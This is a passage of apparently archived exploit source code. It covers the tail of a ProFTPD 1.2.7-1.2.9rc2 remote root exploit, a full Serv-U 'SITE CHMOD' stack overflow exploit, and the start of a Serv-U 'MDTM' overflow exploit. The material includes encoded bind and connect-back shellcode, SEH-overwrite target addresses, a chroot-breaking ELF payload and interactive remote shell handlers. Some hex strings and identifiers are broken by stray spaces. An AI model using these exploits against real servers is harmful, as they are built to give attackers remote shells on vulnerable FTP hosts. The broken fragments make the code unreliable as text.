*(unsigned int *)(buf+24)=dummy;
*(unsigned int *)(buf+28)=dummy;
// this will become the address of an available chunk of memory
// that is returned by new_block() in pool.c
*(unsigned int *)(buf+32)=writeaddr;
// this is what will be returned by palloc() in pool.c
// palloc() is the function that calls new_block() and
// provides the allocation interface for the pools system.
*(unsigned int *)(buf+36)=writeaddr;
memcpy(exploitBuf+exploitBufLen,buf,40);
exploitBufLen+=40;
dummy++;
}
return SUCCESS;
}
int create_passive_server()
{
struct sockaddr_in serverAddr;
int on=1,sock;
status_bar("Creating server");
sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&serverAddr,0,sizeof(struct sockaddr_in));
serverAddr.sin_port=htons(currentPassivePort);
serverAddr.sin_family=AF_INET;
serverAddr.sin_addr.s_addr=htonl(INADDR_ANY);
setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));
if(bind(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {
close(sock);
return FAILURE;
}
if(listen(sock,5)<0) {
close(sock);
return FAILURE;
}
return sock;
}
void usage(char *exploitName)
{
printf("proftpd 1.2.7 - 1.2.9rc2 remote root exploit\n");
printf(" based on code by bkbll ([email protected])\n");
printf(" by Haggis ([email protected])\n");
printf("--------------------------------------------------------------\n");
printf("Usage: %s -t host -l ip [options]\n",exploitName);
printf("Arguments:\n");
printf(" -t <host> host to attack\n");
printf(" -u <username> [anonymous]\n");
printf(" -p <password> [[email protected]]\n");
printf(" -l <local ip address> interface to bind to\n");
printf(" -s sleep for 10secs to allow GDB attach\n");
printf(" -U <path> specify upload path, eg. /incoming\n");
printf(" -P <port> port number of remote proftpd server\n");
printf(" -S <address> start at <address> when bruteforcing\n");
exit(0);
}
int do_remote_shell(int shellSock)
{
fd_set rfds;
char buf[1024];
int retval, r=1;
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(shellSock, &rfds);
retval=select(shellSock+1, &rfds, NULL, NULL, NULL);
if(retval) {
if(FD_ISSET(shellSock, &rfds)) {
buf[(r=recv(shellSock, buf, sizeof(buf)-1,0))]='\0'; // lol
printf("%s", buf);fflush(stdout);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, sizeof(buf)-1))]='\0'; // lmfao
send(shellSock, buf, strlen(buf), 0);
}
}
} while(retval && r); // loop until connection terminates
return SUCCESS;
}
int check_for_linefeed()
{
char *ptr=(char *)&stackWriteAddr;
int i=4;
for(;i;i--)
if(*(ptr++)=='\n')
return FAILURE;
return SUCCESS;
}
// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
va_list ap;
char *buf;
my_sleep(SLEEP_DELAY);
va_start(ap,b);
vasprintf(&buf,b,ap);
send(s,buf,strlen(buf),0);
va_end(ap);
free(buf);
}
// Another handy function to read data from a socket.
void my_recv(int s) {
int len;
my_sleep(SLEEP_DELAY);
memset(serverBuf, 0, SIZE);
len=recv(s, serverBuf, SIZE-1, 0);
serverBuf[len]=0;
}
void doris_chroot_breaker() {
char haggis_magic_buffer[]=
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x 34\x00\x00\x00"
"\xa0\x01\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x 02\x00\x28\x00"
"\x09\x00\x08\x00\x01\x00\x00\x00\x00\x00\x00\x00\x 00\x80\x04\x08"
"\x00\x80\x04\x08\x20\x01\x00\x00\x20\x01\x00\x00\x 05\x00\x00\x00"
"\x00\x10\x00\x00\x01\x00\x00\x00\x20\x01\x00\x00\x 20\x91\x04\x08"
"\x20\x91\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x 06\x00\x00\x00"
"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x55\x89\xe5\x83\xec\x6c\x57\x56\x53\x8d\x45\xa0\x 8d\x7d\xa0\xbe"
"\xc0\x80\x04\x08\xfc\xb9\x17\x00\x00\x00\xf3\xa5\x 66\xa5\xa4\x8d"
"\x45\xa0\x89\x45\x9c\x8b\x5d\x9c\xff\xd3\x8d\x65\x 88\x5b\x5e\x5f"
"\x89\xec\x5d\xc3\x8d\xb6\x00\x00\x00\x00\x8d\xbf\x 00\x00\x00\x00"
"\x31\xc0\x31\xdb\x40\x50\x89\xe1\x66\xbb\x73\x68\x 53\x89\xe3\xb0"
"\x27\xcd\x80\x31\xc0\x89\xe3\xb0\x3d\xcd\x80\x31\x c9\xb1\x0a\x31"
"\xc0\x31\xdb\x66\xbb\x2e\x2e\x53\x89\xe3\xb0\x0c\x cd\x80\x49\x85"
"\xc9\x75\xec\x31\xc0\x31\xdb\xb3\x2e\x53\x89\xe3\x b0\x3d\xcd\x80"
"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x 6e\x89\xe3\x52"
"\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80\x31\xc0\x40\x cd\x80\x00\x00"
"\x00\x47\x43\x43\x3a\x20\x28\x47\x4e\x55\x29\x20\x 32\x2e\x39\x35"
"\x2e\x33\x20\x32\x30\x30\x31\x30\x33\x31\x35\x20\x 28\x53\x75\x53"
"\x45\x29\x00\x08\x00\x00\x00\x00\x00\x00\x00\x01\x 00\x00\x00\x30"
"\x31\x2e\x30\x31\x00\x00\x00\x00\x2e\x73\x79\x6d\x 74\x61\x62\x00"
"\x2e\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x 74\x72\x74\x61"
"\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x 61\x74\x61\x00"
"\x2e\x64\x61\x74\x61\x00\x2e\x73\x62\x73\x73\x00\x 2e\x62\x73\x73"
"\x00\x2e\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x2e\x6e\x 6f\x74\x65\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x 01\x00\x00\x00"
"\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x 40\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x 00\x00\x00\x00"
"\x21\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x c0\x80\x04\x08"
"\xc0\x00\x00\x00\x60\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x20\x00\x00\x00\x00\x00\x00\x00\x29\x00\x00\x00\x 01\x00\x00\x00"
"\x03\x00\x00\x00\x20\x91\x04\x08\x20\x01\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x 00\x00\x00\x00"
"\x2f\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x 20\x91\x04\x08"
"\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x 08\x00\x00\x00"
"\x03\x00\x00\x00\x20\x91\x04\x08\x20\x01\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x 00\x00\x00\x00"
"\x3a\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x20\x01\x00\x00\x23\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x43\x00\x00\x00\x 07\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x43\x01\x00\x00\x 14\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x 00\x00\x00\x00"
"\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x57\x01\x00\x00\x49\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00";
strcpy(filename, "aa");
memset(exploitBuf,0,777);
memcpy(exploitBuf, haggis_magic_buffer, 776);
exploitBufLen=776;
if((controlSock=connect_to_server(ftpPort))==FAILU RE) {
printf("\nCould not connect to target server\n");
exit(1);
}
login_to_server();
my_send(controlSock, "MKD incoming\r\n");
my_recv(controlSock);
my_send(controlSock, "SITE CHMOD 777 incoming\r\n");
my_recv(controlSock);
my_send(controlSock, "CWD incoming\r\n");
my_recv(controlSock);
set_passive_mode(UPLOAD);
upload_file();
my_send(controlSock, "SITE CHMOD 777 aa\r\n");
close(controlSock);
}
// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
struct timespec t;
t.tv_sec=0;
t.tv_nsec=n;
nanosleep(&t,&t);
}
// [2003-10-13]
21 Serv-U FTPD 3.x/4.x "SITE CHMOD" Command Remote Exploit
/*
*-----------------------------------------------------------------------
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : [email protected]
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* : + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug find by kkqq [email protected] ***
* : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage : Servu <-i ip> <-t type> [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*------------------------------------------------------------------------
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88
#define SEH_OFFSET 0x193 //v3.0.0.20~v4.1.0.11
//#define SEH_OFFSET 0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN 2048
#define JMP_OVER "\xeb\x06\xeb\x06"
#define VERSION "1.0"
struct
{
DWORD dwJMP;
char *szDescription;
}targets[] =
{
{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL"}, //for all GB win2000 and winxp
// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K SP3/SP4"}, //wsock32.dll jmp ebx addr
// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11 GB XP SP0/SP1"}, //wsock32.dll jmp ebx addr
// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11 GB/BG 2K SP4"}, //user32.dll jmp ebx addr
// {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL"}, //for all BG win2000 and winxp
// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1"},
// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},
},v;
unsigned char *szSend[4];
unsigned char szCommand[MAX_LEN];
char szDirectory[0x100];
// 28 bytes decode by lion, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x 43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";
// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion";
// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n";
// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x 18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x 36\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\x C7\x6C\x85\x18"
"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x 7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\x C3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\x A6\xA0\x53\x1A"
"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x 6C\xC5\x8F\xC3"
"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\x F7\x93\x1A\xF5"
"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x 71\x68\x55\xD4"
"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\x CC\xDF\x1A\xCC"
"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\x C2\xC2\x6C\xE5"
"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\x C5\x9B\xC0\x6C"
"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\x BD\xEB\x90\x66"
"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x 56\xA0\x48\x9C"
"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x 78\x62\xA8\x8C"
"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x 18\xCD\x8F\x90"
"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x 6D\x6C\x6C\x1D"
"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x 4B\x71\xE0\x58"
"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x 3E\xBD\x7A\x76"
"\xDA\x15\xDA\x74\xEA\x55\xEA";
// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x 18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x 0F\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\x C7\x6C\x85\x18"
"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x 7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\x C3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\x FB\x91\x93\x93"
"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\x E6\xD8\xA0\x53"
"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x 6F\xF9\x83\xCA"
"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x 6D\xD4\xAE\x1A"
"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\x C4\xC3\xC2\xC2"
"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x 18\x5F\xF9\x6C"
"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\x C2\xC5\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x 66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x 9B\x52\x58\x9E"
"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\x B7\x90\x4E\xF5"
"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x 56\x38\xCD\xCA"
"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x 20\x85\x3E\x4A"
"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x 66\x3E\x7F\x6A"
"\x39\xF3\x74\xEA\x55\xEA";
void usage(char *p)
{
int i;
printf( "Usage:\t%s\t<-i ip> <-t type>\n"
"\t\t[-u user] [-p pass] [-d dir]\n"
"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
"[type]:\n" , p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
}
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}
void main(int argc, char **argv)
{
struct sockaddr_in sa, server, client;
WSADATA wsd;
SOCKET s, s2, s3;
int iErr, ret, len;
char szRecvBuff[MAX_LEN];
int i, j, iType;
int iPort=21;
char *ip=NULL, *pUser="ftp", *pPass="[email protected]", *cbHost=NULL;
char user[128], pass[128];
BOOL bCb=FALSE, bLocal=TRUE;
unsigned short shport=53, shport2=0;
unsigned long cbip;
unsigned int timeout=5000, Reuse;
char penetrate[255],cbHost2[20];
int seh_offset;
printf( "Serv-U FTPD 3.x/4.x \"SITE CHMOD\" remote overflow exploit V%s\r\n"
"Bug find by kkqq [email protected], Code By lion ([email protected])\r\n"
"Welcome to HUC website http://www.cnhonker.com\r\n\n"
, VERSION);
seh_offset = SEH_OFFSET;
if(argc < 4)
{
usage(argv[0]);
return;
}
for(i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return;
}
// check parameter
if(i == argc-1)
{
usage(argv[0]);
return;
}
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 't':
iType = atoi(argv[i+1]);
break;
case 'f':
iPort=atoi(argv[i+1]);
break;
case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'd':
if(argv[i+1][0] != '/')
strcpy(szDirectory, "/");
strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
if(szDirectory[strlen(szDirectory)-1] != '/')
strcat(szDirectory, "/");
// correct the directory len
for(j=0;j<(strlen(szDirectory)-1)%8;j++)
strcat(szDirectory, "x");
//printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
seh_offset = seh_offset - strlen(szDirectory)+1;
break;
}
}
if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return;
}
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return;
}
if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return;
}
_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}
sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}
// fill the "site chmod" command
strcpy(szCommand, "site chmod 777 ");
// fill the directory
if(szDirectory[0])
strcat(szCommand, szDirectory);
// fill the egg
for(i=0;i<seh_offset%8;i++)
strcat(szCommand, "\x90");
//strcat(szCommand, "BBBB");
// fill the seh
for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
{
strcat(szCommand, JMP_OVER);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}
// fill the decode
strcat(szCommand, decode);
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9393;
cbip = inet_addr(cbHost)^0x93939393;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
{
// bind shellcode
shport2 = htons(shport)^(u_short)0x9393;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return;
}
// printf("send size %d:%s", strlen(szCommand), szCommand);
__try
{
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
sa.sin_addr.S_un.S_addr=inet_addr(ip);
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);
if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);
if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}
printf("[+] If you don't have a shell it didn't work.\n");
if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}
}
__finally
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
WSACleanup();
}
return;
}
// [2004-01-27]
21 Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit
/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* BUG find by bkbll ([email protected]), cool! :ppPPppPPPpp :D
*
* code by Sam and 2004/01/07
* <[email protected]>
* <[email protected]>
*
*
* Revise History:
* 2004/01/14 add rebind shellcode :> we can bind shellport at ftpd port.
* 2004/01/09 connect back shellcode added :)
* 2004/01/08 21:04 upgrade now :), we put shellcode in file parameter
* we can attack pacthed serv-U;PPPp by airsupply
* 2004/01/08 change shellcode working on serv-u 4.0/4.1/4.2 now
* :D thx airsupply
*
* Compile: gcc -o ex_servu ex_servu.c
*
* how works?
* [root@core exp]# ./sv -h 192.168.10.119 -t 3
* Serv-U FTPD 3.x/4.x MDTM Command remote overflow exploit
* bug find by bkbll ([email protected]) code by Sam ([email protected])
*
* # Connecting......
* [+] Connected.
* USER ftp .
* 10 bytes send.
* PASS sst@SERV-u .
* 17 bytes send.
* [+] login success .
* [+] remote version: Serv-U v4.x with Windows XP EN SP1
* [+] trigger vulnerability !
* [+] 1027 bytes overflow strings sent!
* [+] successed!!
*
*
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* [Sam Chen@SAM C:\]#
*
*
* some thanks/greets to:
* bkbll (he find this bug :D), airsupply, kkqq, icbm
* and everyone else who's KNOW SST;P
* http://0x557.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
#define VER "v5.0"
#define clearbit(buff) bzero(buff, sizeof (buff));
#define padding(buff, a) memset(buff, a, sizeof (buff));
#define MAX_LEN 2048
#define MAX_NUM 4
int x = 0, port = 21, shellport;
char pass[20], user[20];
struct archs {
char *desc;
unsigned int magic;
}architectures[] = {
{
"Serv-U v3.x/4.x/5.x with Windows 2K CN", //winmm.dll
0x77535985
},
{
"Serv-U v3.x/4.x/5.x with Windows 2K BIG5 version", //winmm.dll
0x77531790
},
{
"Serv-U v3.x/4.x/5.x with Windows 2K EN",
0x77575985
},
{
"Serv-U v3.x/4.x/5.x with Windows XP CN SP1",
0x76b12f69
},
{
"Serv-U v3.x/4.x/5.x with Windows XP EN SP1",
0x76b42a3a
}
};
char decoder [] =
/* 36 bytes cool decoder by airsupply :) */
"\x90\x90\x90\x5E\x5F\x5B\xBE\x52\x52\x49\x41\x46\x BF\x52\x52\x31"
"\x41\x47\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x 73\xFC\x75\xF7"
"\xFF\xD3\x90\x90";
/* fork + rebind shellcode by airsupply (one way shellcode) */
char shellcode [] =
"\x53\x52\x49\x41"
/*port offset 120 + 4*/
"\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xD9\x85\x 12\x99\x12\xD9"
"\x91\x18\x75\x19\x98\x99\x99\x12\x65\x12\x76\x32\x 70\x8B\x9B\x99"
"\x99\xC7\xAA\x50\x28\x90\x66\xEE\x65\x71\xB9\x98\x 99\x99\xF1\xF5"
"\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE\xEA\xAB\x C6\xCD\x66\xCC"
"\x9D\x32\xAA\x50\x28\x9C\x66\xEE\x65\x71\x99\x98\x 99\x99\x12\x6C"
"\x71\x94\x98\x99\x99\xAA\x66\x18\x75\x09\x98\x99\x 99\xCD\xF1\x98"
"\x98\x99\x99\x66\xCF\xB5\xC9\xC9\xC9\xC9\xD9\xC9\x D9\xC9\x66\xCF"
"\xA9\x12\x41\xCE\xCE\xF1\x9B\x99\x8C\x5B\x12\x55\x CA\xC8\xF3\x8F"
"\xC8\xCA\x66\xCF\xAD\xC0\xC2\x1C\x59\xEC\x68\xCE\x CA\x66\xCF\xA1"
